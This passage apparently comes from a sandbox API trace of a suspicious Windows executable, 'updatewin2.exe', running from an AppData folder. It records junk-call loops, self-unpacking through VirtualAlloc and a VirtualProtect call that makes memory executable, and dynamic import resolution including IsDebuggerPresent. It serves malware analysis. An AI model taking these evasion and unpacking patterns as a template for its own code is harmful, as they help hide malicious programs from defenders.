lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.690] AddAtomA (lpString=0x0) returned 0x0 [0179.690] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.690] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.691] AddAtomA (lpString=0x0) returned 0x0 [0179.691] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.691] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.691] AddAtomA (lpString=0x0) returned 0x0 [0179.691] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.691] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.691] AddAtomA (lpString=0x0) returned 0x0 [0179.691] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.691] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.691] AddAtomA (lpString=0x0) returned 0x0 [0179.691] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.691] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.691] AddAtomA (lpString=0x0) returned 0x0 [0179.691] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.738] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.738] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.739] AddAtomA (lpString=0x0) returned 0x0 [0179.739] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.739] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.740] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.740] AddAtomA (lpString=0x0) returned 0x0 [0179.740] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.741] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.741] AddAtomA (lpString=0x0) returned 0x0 [0179.741] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.741] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.741] AddAtomA (lpString=0x0) returned 0x0 [0179.741] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.741] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.741] AddAtomA (lpString=0x0) returned 0x0 [0179.741] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.741] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.741] AddAtomA (lpString=0x0) returned 0x0 [0179.741] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.741] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.788] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0179.788] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0179.788] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0179.788] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0179.788] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0179.789] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0179.789] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0179.789] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0179.789] SetErrorMode (uMode=0x400) returned 0x0 [0179.789] SetErrorMode (uMode=0x0) returned 0x400 [0179.789] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0179.789] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0179.793] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0180.245] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.246] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0180.246] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0180.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0180.246] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0180.246] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0180.247] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0180.248] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0180.249] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0180.250] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0180.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0180.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0180.253] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0180.253] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0180.253] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0180.321] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0180.321] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0180.321] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0180.321] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0180.321] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0180.324] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0180.325] atexit (param_1=0x8a63d8) returned 0 [0180.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0x9ef577a0, dwHighDateTime=0x1d60e72)) [0180.325] GetCurrentThreadId () returned 0xad4 [0180.325] GetCurrentProcessId () returned 0xac0 [0180.325] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=30033592093) returned 1 [0180.325] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.325] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.325] GetLastError () returned 0x57 [0180.325] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.325] GetLastError () returned 0x57 [0180.325] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0180.325] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0180.326] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.326] GetLastError () returned 0x57 [0180.326] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0180.326] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0180.326] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.326] GetLastError () returned 0x57 [0180.326] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.326] GetLastError () returned 0x57 [0180.326] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0180.326] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0180.327] GetProcessHeap () returned 0x890000 [0180.327] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.327] GetLastError () returned 0x57 [0180.327] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0180.327] GetLastError () returned 0x57 [0180.327] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0180.327] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x364) returned 0x8bad00 [0180.327] SetLastError (dwErrCode=0x57) [0180.327] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0xc00) returned 0x8bb070 [0180.329] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0x615ee8d1, hStdError=0xfffffffe)) [0180.329] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0180.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0180.329] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0180.329] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe\" " [0180.329] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe\" " [0180.329] IsValidCodePage (CodePage=0x4e4) returned 1 [0180.329] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0180.329] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0180.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0180.329] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0180.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.329] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.329] GetLastError () returned 0x57 [0180.329] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0180.329] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0180.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0180.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, 